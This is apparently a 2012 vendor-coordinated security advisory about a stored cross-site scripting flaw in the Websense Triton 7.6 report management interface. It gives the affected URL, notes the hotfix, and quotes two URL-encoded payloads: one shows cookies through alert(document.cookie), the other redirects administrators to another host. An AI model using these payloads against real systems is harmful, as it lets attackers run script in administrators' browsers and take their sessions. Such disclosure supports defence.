Name: Websense (Triton 7.6) stored XSS in report management UI
Release Date: 30 April 2012
Reference: NGS00141
Discoverer: Ben Williams <[email protected]>
Vendor: Websense
Vendor Reference:
Systems Affected:
Risk: High
Status: Published
Discovered: 2 November 2011
Released: 2 November 2011
Approved: 2 November 2011
Reported: 2 November 2011
Fixed: 2 December 2011
Published: 30 April 2012
Websense (Triton 7.6) stored XSS in report management UI
Websense is one of the world's best known web-filter products.
Websense (Triton 7.6) is prone to stored XSS in the report management UI enabling an attacker run arbitrary javasript in the context of the administrators browser and the Websense administrative UI.
The exploit would require an attacker to:
Websense (Triton 7.6) stored XSS in report management UI
Websense is one of the world's best known web-filter products.
The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and DLP products
Websense (Triton 7.6) is prone to stored XSS in the report management UI enabling an attacker run arbitrary javasript in the context of the administrators browser and the Websense administrative UI.
Affected URL:
https://192.168.233.30:9443/explorer_wse/favorites.exe
(though I believe there may be other affected URLs)
Examples:
Alert pop-up containing the cookies
%22,%2215%22,%229%22,%2228%22,%2215%22,%229%22,%2228%22]]%3b%0D%09alert%28document.cookie%29%3b%0D%09//&user=admin&uid=&action=add&startDate=2011-10-29&endDate=2011-10-
29&vrn=
Arbitrary redirect
%22,%2215%22,%229%22,%2228%22,%2215%22,%229%22,%2228%22]]%3bdocument.location%20%3d%20%22%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%33%33%2e%31%31%2findex2.html
%22%3b//&user=admin&uid=&action=add&startDate=2011-10-29&endDate=2011-10-29&vrn=
In these cases when and administrator subsequently runs a report, the javascript is executed. There are other ways to execute Javascript when the page is initially loaded (but I thought this was a good example).
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx
NGS Secure Research
http://www.ngssecure.com